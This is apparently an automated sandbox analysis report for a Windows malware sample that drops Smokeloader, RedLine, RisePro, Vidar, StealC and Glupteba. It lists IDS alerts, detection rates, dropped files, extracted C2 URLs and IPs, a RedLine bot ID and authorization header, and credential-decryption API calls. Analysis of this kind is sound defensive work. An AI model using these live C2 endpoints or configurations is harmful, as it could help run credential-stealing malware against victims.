Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 37.255.238.137

Timestamp:	03/28/24-09:16:11.255490
SID:	2039103
Source Port:	49870
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Redline Stealer TCP CnC Activity - Source IP: 192.168.2.4 - Destination IP: 5.42.65.0

Timestamp:	03/28/24-09:15:50.277327
SID:	2043231
Source Port:	49819
Destination Port:	29587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 37.255.238.137

Timestamp:	03/28/24-09:16:09.470217
SID:	2039103
Source Port:	49864
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) - Source IP: 192.168.2.4 - Destination IP: 5.42.65.0

Timestamp:	03/28/24-09:15:32.277815
SID:	2046045
Source Port:	49819
Destination Port:	29587
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Token) - Source IP: 5.42.65.117 - Destination IP: 192.168.2.4

Timestamp:	03/28/24-09:15:30.559873
SID:	2046266
Source Port:	50500
Destination Port:	49817
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 193.233.132.67

Timestamp:	03/28/24-09:16:06.487520
SID:	2046269
Source Port:	49815
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP v.0.x (Get_settings) - Source IP: 192.168.2.4 - Destination IP: 193.233.132.67

Timestamp:	03/28/24-09:16:02.154520
SID:	2046268
Source Port:	49815
Destination Port:	50500
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN [ANY.RUN] RisePro TCP (Activity) - Source IP: 192.168.2.4 - Destination IP: 193.233.132.74

Timestamp:	03/28/24-09:16:16.081442
SID:	2046269
Source Port:	49863
Destination Port:	58709
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: i1crvbOZAP.exe

Avira: detected

Found malware configuration

Source: 0000002C.00000002.2173995104.0000000005890000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199658817715"], "Botnet": "22d12fb91f01647fe2107fec81f0cc22", "Version": "8.6"}
Source: 00000006.00000002.2297847494.0000000003681000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: RedLine {"C2 url": "5.42.65.0:29587", "Bot Id": "LogsDiller Cloud (TG: @logsdillabot)", "Authorization Header": "3a050df92d0cf082b2cdaf87863616be"}
Source: 00000012.00000002.2162296306.0000000000B70000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://nidoe.org/tmp/index.php", "http://sodez.ru/tmp/index.php", "http://uama.com.ua/tmp/index.php", "http://talesofpirates.net/tmp/index.php"]}
Source: D5ft_dAZwUuL52qmUM1rPffT.exe.7664.12.memstrmin	Malware Configuration Extractor: StealC {"C2 url": "185.172.128.26/f993692117a3fda2.php"}

Multi AV Scanner detection for domain / URL

Source: ngovpn.com	Virustotal: Detection: 17%	Perma Link
Source: monoblocked.com	Virustotal: Detection: 13%	Perma Link
Source: triedchicken.net	Virustotal: Detection: 18%	Perma Link
Source: carthewasher.net	Virustotal: Detection: 13%	Perma Link
Source: act.fishoaks.net	Virustotal: Detection: 18%	Perma Link
Source: nidoe.org	Virustotal: Detection: 13%	Perma Link
Source: iplis.ru	Virustotal: Detection: 10%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\AFCBAEBAEB.exe	ReversingLabs: Detection: 54%
Source: C:\ProgramData\AFCBAEBAEB.exe	Virustotal: Detection: 42%	Perma Link
Source: C:\ProgramData\DBKKFCBAKK.exe	ReversingLabs: Detection: 45%
Source: C:\ProgramData\DBKKFCBAKK.exe	Virustotal: Detection: 41%	Perma Link
Source: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\ndfbaljqaqzm\dckuybanmlgp.exe	Virustotal: Detection: 66%	Perma Link
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\123p[1].exe	ReversingLabs: Detection: 87%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Arab[1].exe	ReversingLabs: Detection: 27%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Ledger-Live[1].exe	ReversingLabs: Detection: 78%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Retailer[1].exe	ReversingLabs: Detection: 29%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\Soft[1].exe	ReversingLabs: Detection: 45%

Multi AV Scanner detection for submitted file

Source: i1crvbOZAP.exe	Virustotal: Detection: 27%			Perma Link
Source: i1crvbOZAP.exe	ReversingLabs: Detection: 42%

Yara detected Glupteba

Source: Yara match	File source: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.KUc3lCE6xAEEreIlM0ct4583.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.2f70e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KUc3lCE6xAEEreIlM0ct4583.exe PID: 7648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RMz4w55AcOQKH9K459dvrUGA.exe PID: 7672, type: MEMORYSTR

Machine Learning detection for dropped file

Source: C:\ProgramData\AFCBAEBAEB.exe

Joe Sandbox ML: detected

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	12_2_00409540
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	12_2_004155A0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	12_2_00406C10
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	12_2_004094A0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	12_2_0040BF90
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_658B6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	12_2_658B6C80
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A525B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	12_2_65A525B0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A044C0 PK11_PubEncrypt,	12_2_65A044C0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659D4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	12_2_659D4420
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A04440 PK11_PrivDecrypt,	12_2_65A04440
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A2A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	12_2_65A2A730
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659EE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	12_2_659EE6E0
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_659E8670 PK11_ExportEncryptedPrivKeyInfo,	12_2_659E8670
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A0A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	12_2_65A0A650
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A30180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	12_2_65A30180
Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Code function: 12_2_65A043B0 PK11_PubEncryptPKCS1,PR_SetError,	12_2_65A043B0

Bitcoin Miner

Yara detected Glupteba

Source: Yara match	File source: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.KUc3lCE6xAEEreIlM0ct4583.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.2f70e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: KUc3lCE6xAEEreIlM0ct4583.exe PID: 7648, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RMz4w55AcOQKH9K459dvrUGA.exe PID: 7672, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Documents\SimpleAdobe\D5ft_dAZwUuL52qmUM1rPffT.exe	Unpacked PE file: 12.2.D5ft_dAZwUuL52qmUM1rPffT.exe.400000.0.unpack
Source: C:\Users\user\Documents\SimpleAdobe\RMz4w55AcOQKH9K459dvrUGA.exe	Unpacked PE file: 13.2.RMz4w55AcOQKH9K459dvrUGA.exe.400000.0.unpack

Source: C:\Users\user\Documents\SimpleAdobe\KUc3lCE6xAEEreIlM0ct4583.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 104.26.9.59:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.42.248:443 -> 192.168.2.4:49758 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.180.119:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.36.53:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 18.205.93.0:443 -> 192.168.2.4:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.218.160:443 -> 192.168.2.4:49767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.82.182:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 52.216.219.33:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 45.130.41.108:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.164.45.22:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 93.186.225.194:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.0:443 -> 192.168.2.4:49787 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.1:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 95.142.206.2:443 -> 192.168.2.4:49792 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 87.240.190.89:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.63.150:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.132.113:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.63.150:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.63.150:443 -> 192.168.2.4:49808 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.47.27.74:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49843 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.19.138.79:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49854 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49855 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49867 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49884 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49885 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.104.85.160:443 -> 192.168.2.4:49886 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 78.46.229.36:443 -> 192.168.2.4:49888 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49893 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.26.4.15:443 -> 192.168.2.4:49896 version: TLS 1.2

Source:	Binary string: \??\C:\Windows\symbols\exe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\symbols\exe\Instrumental.pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: nss3.pdb@ source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2648652506.0000000065ADF000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: Instrumental.pdb]9 source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Instrumental.pdbpdbtal.pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D2C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\MyProjects\gitlab\ILProtector\ILProtector\Output2010\Win32\Release\Protect32.pdb source: g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000002.2040474083.0000000005188000.00000004.00000800.00020000.00000000.sdmp, g1nHVnlr2tXTEWQsRz_M547D.exe, 00000009.00000002.2305300505.0000000006594000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \Documents\VS Projects\XFilePumper\obj\Release\XFilePumper.pdb source: i1crvbOZAP.exe, 00000000.00000003.1765747947.0000029626040000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: e[C9C:\dijireluw jecifokig b.pdb source: i1crvbOZAP.exe, 00000000.00000003.1782449752.000002962610F000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1780561393.0000029625ED4000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1761238928.0000029625FFE000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1761238928.0000029626005000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: usymbols\exe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: Age does not matchThe module age and .pdb age do not match. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: mC:\Users\user\Documents\SimpleAdobe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000037E9000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000C7A000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Instrumental.pdbmental.pdbpdbtal.pdbtrumental.pdbp source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Instrumental.pdbUTdd source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000002.2646142538.000000006591D000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\SimpleAdobe\fq9BbqPKEgDrDHrc1Aru5zuA.PDB4< source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\Immovables.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A81000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Instrumental.pdb source: i1crvbOZAP.exe, 00000000.00000003.1695585570.0000029625C1E000.00000004.00000020.00020000.00000000.sdmp, fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000000.1838966350.0000000000742000.00000002.00000001.01000000.00000009.sdmp, fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D79000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\SimpleAdobe\tskTMObYcvz1CtypLgyOWpYi.PDB source: tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2141869092.0000000000A60000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\Instrumental.pdb) source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2133747821.0000000000B3A000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: \??\C:\Windows\Instrumental.pdb source: fq9BbqPKEgDrDHrc1Aru5zuA.exe, 00000008.00000002.2139084003.0000000000D40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\x64\Release\XBundlerTlsHelper.pdb source: i1crvbOZAP.exe, i1crvbOZAP.exe, 00000000.00000002.1968244486.00007FF64926D000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: ''.pdb source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2133356336.0000000000758000.00000004.00000010.00020000.00000000.sdmp, tskTMObYcvz1CtypLgyOWpYi.exe, 00000007.00000002.2140687253.0000000000988000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: c:\miniprojects\x86il\il86\x64\release\IL86.pdb! source: i1crvbOZAP.exe, 00000000.00000002.1968244486.00007FF6495B3000.00000040.00000001.01000000.00000003.sdmp
Source:	Binary string: \??\C:\Users\user\Documents\SimpleAdobe\cTThtD77H613MBNsXAevJo07.PDB source: cTThtD77H613MBNsXAevJo07.exe, 00000006.00000002.2147347279.0000000000B00000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symsrv.pdbGCTL source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000C7A000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000037E9000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000C7A000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: EfiGuardDxe.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000ACD000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.000000000363C000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000ACD000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\x64\Release\WinmonProcessMonitor.pdb source: KUc3lCE6xAEEreIlM0ct4583.exe, 0000000A.00000002.2877683342.0000000000843000.00000040.00000001.01000000.0000000B.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2170856076.00000000033B3000.00000040.00001000.00020000.00000000.sdmp, RMz4w55AcOQKH9K459dvrUGA.exe, 0000000D.00000002.2145319694.0000000000843000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: C:\zugi\ranadafigoh\n.pdb source: i1crvbOZAP.exe, 00000000.00000003.1682502618.0000029625C4C000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1684301773.0000029625C93000.00000004.00000020.00020000.00000000.sdmp, i1crvbOZAP.exe, 00000000.00000003.1684301773.0000029625C1E000.00000004.00000020.00020000.00000000.sdmp, D5ft_dAZwUuL52qmUM1rPffT.exe, 0000000C.00000000.1839020396.0000000000410000.00000002.00000001.01000000.0000000A.sdmp
